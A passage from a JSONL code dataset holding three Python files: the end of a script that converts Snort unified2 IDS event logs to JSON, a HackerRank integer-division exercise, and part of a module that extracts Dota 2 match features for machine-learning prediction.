LOG.error(\"Delete not valid in file mode.\")\n return 1\n reader = unified2.FileRecordReader(*args.filenames)\n elif args.directory and args.prefix:\n if args.bookmark:\n bookmark = unified2.Unified2Bookmark(filename=args.bookmark)\n init_filename, init_offset = bookmark.get()\n else:\n init_filename = None\n init_offset = None\n reader = unified2.SpoolRecordReader(\n directory=args.directory,\n prefix=args.prefix,\n follow=args.follow,\n rollover_hook=rollover_hook if args.delete else None,\n init_filename=init_filename,\n init_offset=init_offset)\n else:\n LOG.error(\"No spool or files provided.\")\n return 1\n\n formatter = Formatter(\n msgmap=msgmap, classmap=classmap,\n packet_printable=args.packet_printable,\n packet_hex=args.packet_hex,\n extra_printable=args.extra_printable)\n\n count = 0\n\n try:\n for record in reader:\n try:\n as_json = json.dumps(\n formatter.format(record), sort_keys=args.sort_keys)\n for out in outputs:\n out.write(as_json)\n count += 1\n except Exception as err:\n LOG.error(\"Failed to encode record as JSON: %s: %s\" % (\n str(err), str(record)))\n raise\n if bookmark:\n filename, offset = reader.tell()\n bookmark.update(filename, offset)\n except unified2.UnknownRecordType as err:\n if count == 0:\n LOG.error(\"%s: Is this a unified2 file?\" % (err))\n else:\n LOG.error(err)\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"jasonish/py-idstools","sub_path":"idstools/scripts/u2json.py","file_name":"u2json.py","file_ext":"py","file_size_in_byte":12866,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"61"} +{"seq_id":"12582818284","text":"class Farhad:\r\n def __init__(self,a,b,):\r\n self.a=a\r\n self.b=b\r\n def Calculation(self):\r\n div = self.a / self.b\r\n mod = self.a % self.b\r\n #def show(self):\r\n print(int(div))\r\n print(mod)\r\n print(f\"({int(div)},{mod})\")\r\nfarhad=Farhad(a=int(input()),b=int(input()))\r\nfarhad.Calculation()","repo_name":"Farhad0111/Mod_Divmod_HackerRank.py","sub_path":"Mod_Divmod.py","file_name":"Mod_Divmod.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10271917231","text":"import json\nimport os\nfrom multiprocessing import Pool\n\nimport numpy as np\nimport pandas\nimport scipy.stats as stats\nimport torch\nfrom torch.nn.utils.rnn import pad_sequence\nfrom torch.utils.data import Dataset\nfrom tqdm import tqdm\n\n__all__ = ['DotaData', 'load_as_data_frame']\n\n\ndef _check_path_match(s):\n \"\"\" Random hash to split data set to train, valid, and test. 
\"\"\"\n if not s.endswith('.json'):\n return 'none'\n u = int(s[:-5]) % 1000000021\n u = (u * 479342492 + 277101274) % 1000000021\n v = int(s[:-5]) % 1000000033\n v = (v * 27448077 + 702331637) % 1000000033\n w = ((u + v) * 897630631 + 28665357) % 1000000087\n w = w / (1000000087.0 - 1.0)\n if w < 0.05:\n return 'test'\n elif 0.05 <= w < 0.15:\n return 'valid'\n else:\n return 'train'\n\n\nlv_xp_req = [\n 0,\n 230,\n 600,\n 1080,\n 1680,\n 2300,\n 2940,\n 3600,\n 4280,\n 5080,\n 5900,\n 6740,\n 7640,\n 8865,\n 10115,\n 11390,\n 12690,\n 14015,\n 15415,\n 16905,\n 18405,\n 20155,\n 22155,\n 24405,\n 26905,\n]\n\nhero2id = {\n 'npc_dota_hero_antimage': 1,\n 'npc_dota_hero_axe': 2,\n 'npc_dota_hero_bane': 3,\n 'npc_dota_hero_bloodseeker': 4,\n 'npc_dota_hero_crystal_maiden': 5,\n 'npc_dota_hero_drow_ranger': 6,\n 'npc_dota_hero_earthshaker': 7,\n 'npc_dota_hero_juggernaut': 8,\n 'npc_dota_hero_mirana': 9,\n 'npc_dota_hero_nevermore': 11,\n 'npc_dota_hero_morphling': 10,\n 'npc_dota_hero_phantom_lancer': 12,\n 'npc_dota_hero_puck': 13,\n 'npc_dota_hero_pudge': 14,\n 'npc_dota_hero_razor': 15,\n 'npc_dota_hero_sand_king': 16,\n 'npc_dota_hero_storm_spirit': 17,\n 'npc_dota_hero_sven': 18,\n 'npc_dota_hero_tiny': 19,\n 'npc_dota_hero_vengefulspirit': 20,\n 'npc_dota_hero_windrunner': 21,\n 'npc_dota_hero_zuus': 22,\n 'npc_dota_hero_kunkka': 23,\n 'npc_dota_hero_lina': 25,\n 'npc_dota_hero_lich': 31,\n 'npc_dota_hero_lion': 26,\n 'npc_dota_hero_shadow_shaman': 27,\n 'npc_dota_hero_slardar': 28,\n 'npc_dota_hero_tidehunter': 29,\n 'npc_dota_hero_witch_doctor': 30,\n 'npc_dota_hero_riki': 32,\n 'npc_dota_hero_enigma': 33,\n 'npc_dota_hero_tinker': 34,\n 'npc_dota_hero_sniper': 35,\n 'npc_dota_hero_necrolyte': 36,\n 'npc_dota_hero_warlock': 37,\n 'npc_dota_hero_beastmaster': 38,\n 'npc_dota_hero_queenofpain': 39,\n 'npc_dota_hero_venomancer': 40,\n 'npc_dota_hero_faceless_void': 41,\n 'npc_dota_hero_skeleton_king': 42,\n 'npc_dota_hero_death_prophet': 43,\n 'npc_dota_hero_phantom_assassin': 44,\n 'npc_dota_hero_pugna': 45,\n 'npc_dota_hero_templar_assassin': 46,\n 'npc_dota_hero_viper': 47,\n 'npc_dota_hero_luna': 48,\n 'npc_dota_hero_dragon_knight': 49,\n 'npc_dota_hero_dazzle': 50,\n 'npc_dota_hero_rattletrap': 51,\n 'npc_dota_hero_leshrac': 52,\n 'npc_dota_hero_furion': 53,\n 'npc_dota_hero_life_stealer': 54,\n 'npc_dota_hero_dark_seer': 55,\n 'npc_dota_hero_clinkz': 56,\n 'npc_dota_hero_omniknight': 57,\n 'npc_dota_hero_enchantress': 58,\n 'npc_dota_hero_huskar': 59,\n 'npc_dota_hero_night_stalker': 60,\n 'npc_dota_hero_broodmother': 61,\n 'npc_dota_hero_bounty_hunter': 62,\n 'npc_dota_hero_weaver': 63,\n 'npc_dota_hero_jakiro': 64,\n 'npc_dota_hero_batrider': 65,\n 'npc_dota_hero_chen': 66,\n 'npc_dota_hero_spectre': 67,\n 'npc_dota_hero_doom_bringer': 69,\n 'npc_dota_hero_ancient_apparition': 68,\n 'npc_dota_hero_ursa': 70,\n 'npc_dota_hero_spirit_breaker': 71,\n 'npc_dota_hero_gyrocopter': 72,\n 'npc_dota_hero_alchemist': 73,\n 'npc_dota_hero_invoker': 74,\n 'npc_dota_hero_silencer': 75,\n 'npc_dota_hero_obsidian_destroyer': 76,\n 'npc_dota_hero_lycan': 77,\n 'npc_dota_hero_brewmaster': 78,\n 'npc_dota_hero_shadow_demon': 79,\n 'npc_dota_hero_lone_druid': 80,\n 'npc_dota_hero_chaos_knight': 81,\n 'npc_dota_hero_meepo': 82,\n 'npc_dota_hero_treant': 83,\n 'npc_dota_hero_ogre_magi': 84,\n 'npc_dota_hero_undying': 85,\n 'npc_dota_hero_rubick': 86,\n 'npc_dota_hero_disruptor': 87,\n 'npc_dota_hero_nyx_assassin': 88,\n 'npc_dota_hero_naga_siren': 89,\n 'npc_dota_hero_keeper_of_the_light': 90,\n 
'npc_dota_hero_wisp': 91,\n 'npc_dota_hero_visage': 92,\n 'npc_dota_hero_slark': 93,\n 'npc_dota_hero_medusa': 94,\n 'npc_dota_hero_troll_warlord': 95,\n 'npc_dota_hero_centaur': 96,\n 'npc_dota_hero_magnataur': 97,\n 'npc_dota_hero_shredder': 98,\n 'npc_dota_hero_bristleback': 99,\n 'npc_dota_hero_tusk': 100,\n 'npc_dota_hero_skywrath_mage': 101,\n 'npc_dota_hero_abaddon': 102,\n 'npc_dota_hero_elder_titan': 103,\n 'npc_dota_hero_legion_commander': 104,\n 'npc_dota_hero_ember_spirit': 106,\n 'npc_dota_hero_earth_spirit': 107,\n 'npc_dota_hero_terrorblade': 109,\n 'npc_dota_hero_phoenix': 110,\n 'npc_dota_hero_oracle': 111,\n 'npc_dota_hero_techies': 105,\n 'npc_dota_hero_target_dummy': 127,\n 'npc_dota_hero_winter_wyvern': 112,\n 'npc_dota_hero_arc_warden': 113,\n 'npc_dota_hero_abyssal_underlord': 108,\n 'npc_dota_hero_monkey_king': 114,\n 'npc_dota_hero_pangolier': 120,\n 'npc_dota_hero_dark_willow': 119,\n 'npc_dota_hero_grimstroke': 121\n}\n\nitems_list = [\n 'aegis',\n 'courier',\n 'boots_of_elves',\n 'belt_of_strength',\n 'blade_of_alacrity',\n 'blades_of_attack',\n 'blight_stone',\n 'blink',\n 'boots',\n 'bottle',\n 'broadsword',\n 'chainmail',\n 'cheese',\n 'circlet',\n 'clarity',\n 'claymore',\n 'cloak',\n 'demon_edge',\n 'dust',\n 'eagle',\n 'enchanted_mango',\n 'energy_booster',\n 'faerie_fire',\n 'flying_courier',\n 'gauntlets',\n 'gem',\n 'ghost',\n 'gloves',\n 'flask',\n 'helm_of_iron_will',\n 'hyperstone',\n 'infused_raindrop',\n 'branches',\n 'javelin',\n 'magic_stick',\n 'mantle',\n 'mithril_hammer',\n 'lifesteal',\n 'mystic_staff',\n 'ward_observer',\n 'ogre_axe',\n 'orb_of_venom',\n 'platemail',\n 'point_booster',\n 'quarterstaff',\n 'quelling_blade',\n 'reaver',\n 'refresher_shard',\n 'ring_of_health',\n 'ring_of_protection',\n 'ring_of_regen',\n 'robe',\n 'relic',\n 'sobi_mask',\n 'ward_sentry',\n 'shadow_amulet',\n 'slippers',\n 'smoke_of_deceit',\n 'staff_of_wizardry',\n 'stout_shield',\n 'talisman_of_evasion',\n 'tango',\n 'tango_single',\n 'tome_of_knowledge',\n 'tpscroll',\n 'ultimate_orb',\n 'vitality_booster',\n 'void_stone',\n 'wind_lace',\n]\n\n\ndef get_lv_from_total_xp(xp):\n return sum(1 for req in lv_xp_req if xp >= req)\n\n\ndef chatwheel_count(m, player, t):\n return sum(\n 1 for c in m['chat'] if c['type'] == 'chatwheel' and 'slot' in c and c['slot'] == player and c['time'] < t * 60)\n\n\ndef chat_count(m, player, t):\n return sum(\n 1 for c in m['chat'] if c['type'] == 'chat' and 'slot' in c and c['slot'] == player and c['time'] < t * 60)\n\n\ndef purchase_states_array(m, items, t):\n item2id = {}\n for i, j in enumerate(items):\n item2id[j] = i\n r = torch.zeros(10, len(items))\n for i in range(10):\n for j in m['players'][i]['purchase_log']:\n if j['time'] < t * 60 and j['key'] in item2id:\n r[i, item2id[j['key']]] += 1\n return r\n\n\ndef purchase_states_dict(m, items, t):\n r = {}\n for i in items:\n for j in range(5):\n r[f\"purchase_{i}_0_{j}\"] = 0\n for j in range(5, 10):\n r[f\"purchase_{i}_1_{j - 5}\"] = 0\n for j in range(5):\n for k in m['players'][j]['purchase_log']:\n if k['time'] < t * 60:\n for h in items:\n if k['key'] == h:\n r[f\"purchase_{h}_0_{j}\"] += 1\n for j in range(5, 10):\n for k in m['players'][j]['purchase_log']:\n if k['time'] < t * 60:\n for h in items:\n if k['key'] == h:\n r[f\"purchase_{h}_1_{j - 5}\"] += 1\n for i in items:\n for j, v in enumerate(sorted([r[f\"purchase_{i}_0_{j}\"] for j in range(5)])):\n r[f\"purchase_{i}_0_{j}\"] = v\n for j, v in enumerate(sorted([r[f\"purchase_{i}_1_{j - 5}\"] for j in range(5, 
10)])):\n r[f\"purchase_{i}_1_{j}\"] = v\n return r\n\n\ndef building_id(s):\n if s.startswith('npc_dota_goodguys_'):\n pos = 0\n elif s.startswith('npc_dota_badguys_'):\n pos = 17\n else:\n raise Exception(\"tower key \" + s + \" not recognized\")\n if s.endswith('tower1_mid'):\n return pos + 0\n elif s.endswith('tower1_bot'):\n return pos + 1\n elif s.endswith('tower1_top'):\n return pos + 2\n elif s.endswith('tower2_mid'):\n return pos + 3\n elif s.endswith('tower2_bot'):\n return pos + 4\n elif s.endswith('tower2_top'):\n return pos + 5\n elif s.endswith('tower3_mid'):\n return pos + 6\n elif s.endswith('tower3_bot'):\n return pos + 7\n elif s.endswith('tower3_top'):\n return pos + 8\n elif s.endswith('melee_rax_mid'):\n return pos + 9\n elif s.endswith('range_rax_mid'):\n return pos + 10\n elif s.endswith('melee_rax_bot'):\n return pos + 11\n elif s.endswith('range_rax_bot'):\n return pos + 12\n elif s.endswith('melee_rax_top'):\n return pos + 13\n elif s.endswith('range_rax_top'):\n return pos + 14\n elif s.endswith('healers'):\n return pos + 15\n elif s.endswith('tower4'):\n return pos + 16\n elif s.endswith('fort'):\n return -1\n else:\n raise Exception('unrecognized key ' + s)\n\n\ndef building_states_array(m, t):\n r = torch.ones(34)\n r[building_id('npc_dota_goodguys_healers')] += 1\n r[building_id('npc_dota_goodguys_tower4')] += 1\n r[building_id('npc_dota_badguys_healers')] += 1\n r[building_id('npc_dota_badguys_tower4')] += 1\n for o in m['objectives']:\n if o['type'] == 'building_kill' and o['time'] < t * 60:\n bid = building_id(o['key'])\n if bid != -1:\n r[bid] -= 1\n return r\n\n\ndef building_states_dict(m, t):\n r = {}\n blst = ([f\"tower{i}_{j}\" for i in range(1, 4) for j in ['mid', 'bot', 'top']] +\n [f\"{i}_rax_{j}\" for i in ['melee', 'range'] for j in ['mid', 'bot', 'top']] +\n ['healers', 'tower4', 'fort'])\n for i in [0, 1]:\n for j in blst:\n r[f\"building_{i}_{j}\"] = 1\n r[f\"building_{i}_tower4\"] += 1\n r[f\"building_{i}_healers\"] += 1\n for o in m['objectives']:\n if o['type'] == 'building_kill' and o['time'] < t * 60:\n if o['key'].startswith('npc_dota_goodguys_'):\n pos = 0\n elif o['key'].startswith('npc_dota_badguys_'):\n pos = 1\n else:\n raise Exception(\"tower key \" + o['key'] + \" not recognized\")\n for j in blst:\n if o['key'].endswith(j):\n r[f\"building_{pos}_{j}\"] -= 1\n return r\n\n\ndef player_kill_count(json_obj, player_slot, time):\n for p in json_obj['players']:\n if p['player_slot'] == player_slot:\n kc = 0\n for k in p['kills_log']:\n if k['time'] < time:\n kc += 1\n return kc\n raise ValueError('Bad player slot')\n\n\ndef player_death_count(json_obj, player_slot, time):\n target_hero_id = -1\n for p in json_obj['players']:\n if p['player_slot'] == player_slot:\n target_hero_id = p['hero_id']\n break\n if target_hero_id == -1:\n raise ValueError('Bad player slot')\n kc = 0\n for p in json_obj['players']:\n for k in p['kills_log']:\n if k['time'] < time and hero2id[k['key']] == target_hero_id:\n kc += 1\n return kc\n\n\ndef _runes_count(m, player, t):\n r = np.zeros(7)\n for i in m['players'][player]['runes_log']:\n if i['time'] < t * 60:\n for j in range(7):\n if j == i['key']:\n r[j] += 1\n return r\n\n\ndef rune_states_dict(m, t):\n l0 = np.stack([_runes_count(m, i, t) for i in range(5)]).T\n l1 = np.stack([_runes_count(m, i, t) for i in range(5, 10)]).T\n l0 = np.sort(l0, axis=1)\n l1 = np.sort(l1, axis=1)\n r = {}\n for j in range(7):\n for i in range(5):\n r[f\"rune_{j}_0_{i}\"] = l0[j, i]\n for j in range(7):\n for i in 
range(5):\n r[f\"rune_{j}_1_{i}\"] = l1[j, i]\n return r\n\n\nclass _FileLoader:\n def __init__(self, path_data):\n self.path_data = path_data\n\n def __call__(self, match_id):\n path_file = os.path.join(self.path_data, f\"{match_id}.json\")\n lst = []\n with open(path_file, mode='r', encoding='utf-8') as f:\n m = json.load(f)\n # Extract slices of 10%, 20%, ..., 90% of the time of a match.\n for pct in [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]:\n t = int(m['duration'] * pct / 60)\n mm = {\n 'result': 1 - int(m['radiant_win'])\n }\n for i in range(5):\n assert (m['players'][i]['player_slot'] == i)\n assert (m['players'][i + 5]['player_slot'] == i + 128)\n for i in range(121):\n mm[f'heroes_0_has_{i}'] = 0\n mm[f'heroes_1_has_{i}'] = 0\n for i in range(5):\n mm[f\"heroes_0_has_{m['players'][i]['hero_id'] - 1}\"] = 1\n for i in range(5, 10):\n mm[f\"heroes_1_has_{m['players'][i]['hero_id'] - 1}\"] = 1\n for i, v in enumerate(sorted([m['players'][i]['gold_t'][t] for i in range(5)])):\n mm[f\"gold_0_{i}\"] = v\n for i, v in enumerate(sorted([m['players'][i]['gold_t'][t] for i in range(5, 10)])):\n mm[f\"gold_1_{i}\"] = v\n for i, v in enumerate(sorted([m['players'][i]['xp_t'][t] for i in range(5)])):\n mm[f\"xp_0_{i}\"] = v\n for i, v in enumerate(sorted([m['players'][i]['xp_t'][t] for i in range(5, 10)])):\n mm[f\"xp_1_{i}\"] = v\n for i, v in enumerate(sorted([get_lv_from_total_xp(m['players'][i]['xp_t'][t])\n for i in range(5)])):\n mm[f\"lv_0_{i}\"] = v\n for i, v in enumerate(sorted([get_lv_from_total_xp(m['players'][i]['xp_t'][t])\n for i in range(5, 10)])):\n mm[f\"lv_1_{i}\"] = v\n for i, v in enumerate(sorted([m['players'][i]['lh_t'][t] for i in range(5)])):\n mm[f\"lh_0_{i}\"] = v\n for i, v in enumerate(sorted([m['players'][i]['lh_t'][t] for i in range(5, 10)])):\n mm[f\"lh_1_{i}\"] = v\n for i, v in enumerate(sorted([m['players'][i]['dn_t'][t] for i in range(5)])):\n mm[f\"dn_0_{i}\"] = v\n for i, v in enumerate(sorted([m['players'][i]['dn_t'][t] for i in range(5, 10)])):\n mm[f\"dn_1_{i}\"] = v\n for i, v in enumerate(sorted([sum(1 for it in m['players'][i]['obs_log'] if it['time'] < t * 60)\n for i in range(5)])):\n mm[f\"obs_0_{i}\"] = v\n for i, v in enumerate(sorted([sum(1 for it in m['players'][i]['obs_log'] if it['time'] < t * 60)\n for i in range(5, 10)])):\n mm[f\"obs_1_{i}\"] = v\n for i, v in enumerate(sorted([sum(1 for it in m['players'][i]['sen_log'] if it['time'] < t * 60)\n for i in range(5)])):\n mm[f\"sen_0_{i}\"] = v\n for i, v in enumerate(sorted([sum(1 for it in m['players'][i]['sen_log'] if it['time'] < t * 60)\n for i in range(5, 10)])):\n mm[f\"sen_1_{i}\"] = v\n for i, v in enumerate(sorted([sum(1 for it in m['players'][i]['kills_log'] if it['time'] < t * 60)\n for i in range(5)])):\n mm[f\"kills_0_{i}\"] = v\n for i, v in enumerate(sorted([sum(1 for it in m['players'][i]['kills_log'] if it['time'] < t * 60)\n for i in range(5, 10)])):\n mm[f\"kills_1_{i}\"] = v\n for i, v in enumerate(sorted([player_death_count(m, i, t * 60) for i in range(5)])):\n mm[f\"deaths_0_{i}\"] = v\n for i, v in enumerate(sorted([player_death_count(m, i, t * 60) for i in range(128, 128 + 5)])):\n mm[f\"deaths_1_{i}\"] = v\n for i, v in enumerate(sorted([sum(tf['players'][i]['damage']\n for tf in m['teamfights'] if tf['end'] < t * 60)\n for i in range(5)])):\n mm[f\"tf_damage_0_{i}\"] = v\n for i, v in enumerate(sorted([sum(tf['players'][i]['damage']\n for tf in m['teamfights'] if tf['end'] < t * 60)\n for i in range(5, 10)])):\n mm[f\"tf_damage_1_{i}\"] = v\n for k, v in 
building_states_dict(m, t).items():\n mm[k] = v\n for i, v in enumerate(sorted([chatwheel_count(m, i, t) for i in range(5)])):\n mm[f\"chatwheel_0_{i}\"] = v\n for i, v in enumerate(sorted([chatwheel_count(m, i, t) for i in range(5, 10)])):\n mm[f\"chatwheel_1_{i}\"] = v\n for i, v in enumerate(sorted([chat_count(m, i, t) for i in range(5)])):\n mm[f\"chat_0_{i}\"] = v\n for i, v in enumerate(sorted([chat_count(m, i, t) for i in range(5, 10)])):\n mm[f\"chat_1_{i}\"] = v\n for i, v in enumerate(sorted([chatwheel_count(m, i, t) + chat_count(m, i, t)\n for i in range(5)])):\n mm[f\"chat_total_0_{i}\"] = v\n for i, v in enumerate(sorted([chatwheel_count(m, i, t) + chat_count(m, i, t)\n for i in range(5, 10)])):\n mm[f\"chat_total_1_{i}\"] = v\n mm['roshan_0'] = sum(1 for o in m['objectives']\n if o['type'] == 'CHAT_MESSAGE_ROSHAN_KILL'\n and o['time'] < t * 60 and o['team'] == 2)\n mm['roshan_1'] = sum(1 for o in m['objectives']\n if o['type'] == 'CHAT_MESSAGE_ROSHAN_KILL'\n and o['time'] < t * 60 and o['team'] == 3)\n mm['time'] = t\n for k, v in purchase_states_dict(m, items_list, t).items():\n mm[k] = v\n for k, v in rune_states_dict(m, t).items():\n mm[k] = v\n mm['pred_vict_0'] = sum(m['players'][i]['pred_vict'] for i in range(5))\n mm['pred_vict_1'] = sum(m['players'][i]['pred_vict'] for i in range(5, 10))\n for i, v in enumerate(sorted([sum(1 for b in m['players'][i]['buyback_log'] if b['time'] < t * 60)\n for i in range(5)])):\n mm[f\"buyback_0_{i}\"] = v\n for i, v in enumerate(sorted([sum(1 for b in m['players'][i]['buyback_log'] if b['time'] < t * 60)\n for i in range(5, 10)])):\n mm[f\"buyback_1_{i}\"] = v\n mm['region'] = m['region']\n\n # derivatives (total)\n mm[\"gold_0_total\"] = sum(m['players'][i]['gold_t'][t] for i in range(5))\n mm[\"gold_1_total\"] = sum(m['players'][i]['gold_t'][t] for i in range(5, 10))\n mm[\"xp_0_total\"] = sum(m['players'][i]['xp_t'][t] for i in range(5))\n mm[\"xp_1_total\"] = sum(m['players'][i]['xp_t'][t] for i in range(5, 10))\n mm[\"lh_0_total\"] = sum(m['players'][i]['lh_t'][t] for i in range(5))\n mm[\"lh_1_total\"] = sum(m['players'][i]['lh_t'][t] for i in range(5, 10))\n mm[\"dn_0_total\"] = sum(m['players'][i]['dn_t'][t] for i in range(5))\n mm[\"dn_1_total\"] = sum(m['players'][i]['dn_t'][t] for i in range(5, 10))\n mm[\"obs_0_total\"] = sum(\n sum(1 for it in m['players'][i]['obs_log'] if it['time'] < t * 60) for i in range(5))\n mm[\"obs_1_total\"] = sum(\n sum(1 for it in m['players'][i]['obs_log'] if it['time'] < t * 60) for i in range(5, 10))\n mm[\"sen_0_total\"] = sum(\n sum(1 for it in m['players'][i]['sen_log'] if it['time'] < t * 60) for i in range(5))\n mm[\"sen_1_total\"] = sum(\n sum(1 for it in m['players'][i]['sen_log'] if it['time'] < t * 60) for i in range(5, 10))\n mm[\"kills_0_total\"] = sum(\n sum(1 for it in m['players'][i]['kills_log'] if it['time'] < t * 60) for i in range(5))\n mm[\"kills_1_total\"] = sum(\n sum(1 for it in m['players'][i]['kills_log'] if it['time'] < t * 60) for i in range(5, 10))\n mm[\"chatwheel_0_total\"] = sum(chatwheel_count(m, i, t) for i in range(5))\n mm[\"chatwheel_1_total\"] = sum(chatwheel_count(m, i, t) for i in range(5, 10))\n mm[\"rune_0_total\"] = sum(mm[f\"rune_{j}_0_{i}\"] for j in range(7) for i in range(5))\n mm[\"rune_1_total\"] = sum(mm[f\"rune_{j}_1_{i}\"] for j in range(7) for i in range(5))\n mm[\"buyback_0_total\"] = sum(\n sum(1 for b in m['players'][i]['buyback_log'] if b['time'] < t * 60) for i in range(5))\n mm[\"buyback_1_total\"] = sum(\n sum(1 for b in 
m['players'][i]['buyback_log'] if b['time'] < t * 60) for i in range(5, 10))\n\n # derivatives (diff)\n mm['pred_vict_diff'] = mm['pred_vict_0'] - mm['pred_vict_1']\n mm['buyback_diff'] = mm['buyback_0_total'] - mm['buyback_1_total']\n\n # derivatives (ratio)\n for i, v in enumerate(sorted([m['players'][i]['gold_t'][t] for i in range(5)])):\n mm[f\"gold_0_ratio_{i}\"] = (v + 1) / (mm[\"gold_0_total\"] + mm[\"gold_1_total\"] + 10)\n for i, v in enumerate(sorted([m['players'][i]['gold_t'][t] for i in range(5, 10)])):\n mm[f\"gold_1_ratio_{i}\"] = (v + 1) / (mm[\"gold_0_total\"] + mm[\"gold_1_total\"] + 10)\n for i, v in enumerate(sorted([m['players'][i]['xp_t'][t] for i in range(5)])):\n mm[f\"xp_0_ratio_{i}\"] = (v + 1) / (mm[\"xp_0_total\"] + mm[\"xp_1_total\"] + 10)\n for i, v in enumerate(sorted([m['players'][i]['xp_t'][t] for i in range(5, 10)])):\n mm[f\"xp_1_ratio_{i}\"] = (v + 1) / (mm[\"xp_0_total\"] + mm[\"xp_1_total\"] + 10)\n for i, v in enumerate(sorted([m['players'][i]['lh_t'][t] for i in range(5)])):\n mm[f\"lh_0_ratio_{i}\"] = (v + 1) / (mm[\"lh_0_total\"] + mm[\"lh_1_total\"] + 10)\n for i, v in enumerate(sorted([m['players'][i]['lh_t'][t] for i in range(5, 10)])):\n mm[f\"lh_1_ratio_{i}\"] = (v + 1) / (mm[\"lh_0_total\"] + mm[\"lh_1_total\"] + 10)\n for i, v in enumerate(sorted([m['players'][i]['dn_t'][t] for i in range(5)])):\n mm[f\"dn_0_ratio_{i}\"] = (v + 1) / (mm[\"dn_0_total\"] + mm[\"dn_1_total\"] + 10)\n for i, v in enumerate(sorted([m['players'][i]['dn_t'][t] for i in range(5, 10)])):\n mm[f\"dn_1_ratio_{i}\"] = (v + 1) / (mm[\"dn_0_total\"] + mm[\"dn_1_total\"] + 10)\n mm[\"gold_ratio_total\"] = (mm[\"gold_0_total\"] + 1) / (mm[\"gold_0_total\"] + mm[\"gold_1_total\"] + 2)\n mm[\"xp_ratio_total\"] = (mm[\"xp_0_total\"] + 1) / (mm[\"xp_0_total\"] + mm[\"xp_1_total\"] + 2)\n mm[\"lh_ratio_total\"] = (mm[\"lh_0_total\"] + 1) / (mm[\"lh_0_total\"] + mm[\"lh_1_total\"] + 2)\n mm[\"dn_ratio_total\"] = (mm[\"dn_0_total\"] + 1) / (mm[\"dn_0_total\"] + mm[\"dn_1_total\"] + 2)\n mm[\"obs_ratio\"] = (mm[\"obs_0_total\"] + 1) / (mm[\"obs_0_total\"] + mm[\"obs_1_total\"] + 2)\n mm[\"sen_ratio\"] = (mm[\"sen_0_total\"] + 1) / (mm[\"sen_0_total\"] + mm[\"sen_1_total\"] + 2)\n mm[\"kill_ratio\"] = (mm[\"kills_0_total\"] + 1) / (mm[\"kills_0_total\"] + mm[\"kills_1_total\"] + 2)\n mm[\"chatwheel_ratio\"] = (mm[\"chatwheel_0_total\"] + 1) / (\n mm[\"chatwheel_0_total\"] + mm[\"chatwheel_1_total\"] + 2)\n mm[\"rune_ratio\"] = (mm[\"rune_0_total\"] + 1) / (mm[\"rune_0_total\"] + mm[\"rune_1_total\"] + 2)\n\n # derivatives (delta)\n for i, v in enumerate(sorted(\n [m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 1, 0)] for i in\n range(5)])):\n mm[f\"gold_delta1_0_{i}\"] = v\n for i, v in enumerate(sorted(\n [m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 1, 0)] for i in\n range(5, 10)])):\n mm[f\"gold_delta1_1_{i}\"] = v\n for i, v in enumerate(sorted(\n [m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 5, 0)] for i in\n range(5)])):\n mm[f\"gold_delta5_0_{i}\"] = v\n for i, v in enumerate(sorted(\n [m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 5, 0)] for i in\n range(5, 10)])):\n mm[f\"gold_delta5_1_{i}\"] = v\n for i, v in enumerate(sorted(\n [m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 1, 0)] for i in range(5)])):\n mm[f\"xp_delta1_0_{i}\"] = v\n for i, v in enumerate(sorted(\n [m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 1, 0)] for i in\n range(5, 10)])):\n 
mm[f\"xp_delta1_1_{i}\"] = v\n for i, v in enumerate(sorted(\n [m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 5, 0)] for i in range(5)])):\n mm[f\"xp_delta5_0_{i}\"] = v\n for i, v in enumerate(sorted(\n [m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 5, 0)] for i in\n range(5, 10)])):\n mm[f\"xp_delta5_1_{i}\"] = v\n mm[\"obs_delta6_0\"] = sum(\n sum(1 for it in m['players'][i]['obs_log'] if (t - 6) * 60 <= it['time'] < t * 60) for i in\n range(5))\n mm[\"obs_delta6_1\"] = sum(\n sum(1 for it in m['players'][i]['obs_log'] if (t - 6) * 60 <= it['time'] < t * 60) for i in\n range(5, 10))\n mm[\"sen_delta6_0\"] = sum(\n sum(1 for it in m['players'][i]['sen_log'] if (t - 6) * 60 <= it['time'] < t * 60) for i in\n range(5))\n mm[\"sen_delta6_1\"] = sum(\n sum(1 for it in m['players'][i]['sen_log'] if (t - 6) * 60 <= it['time'] < t * 60) for i in\n range(5, 10))\n\n # derivatives (delta_total)\n mm[\"gold_delta1_total_0\"] = sum(\n m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 1, 0)] for i in range(5))\n mm[\"gold_delta1_total_1\"] = sum(\n m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 1, 0)] for i in range(5, 10))\n mm[\"gold_delta5_total_0\"] = sum(\n m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 5, 0)] for i in range(5))\n mm[\"gold_delta5_total_1\"] = sum(\n m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 5, 0)] for i in range(5, 10))\n mm[\"xp_delta1_total_0\"] = sum(\n m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 1, 0)] for i in range(5))\n mm[\"xp_delta1_total_1\"] = sum(\n m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 1, 0)] for i in range(5, 10))\n mm[\"xp_delta5_total_0\"] = sum(\n m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 5, 0)] for i in range(5))\n mm[\"xp_delta5_total_1\"] = sum(\n m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 5, 0)] for i in range(5, 10))\n\n # derivatives (delta_ratio)\n mm[\"gold_delta1_ratio_total\"] = (mm[\"gold_delta1_total_0\"] + 1) / (\n mm[\"gold_delta1_total_0\"] + mm[\"gold_delta1_total_1\"] + 2)\n 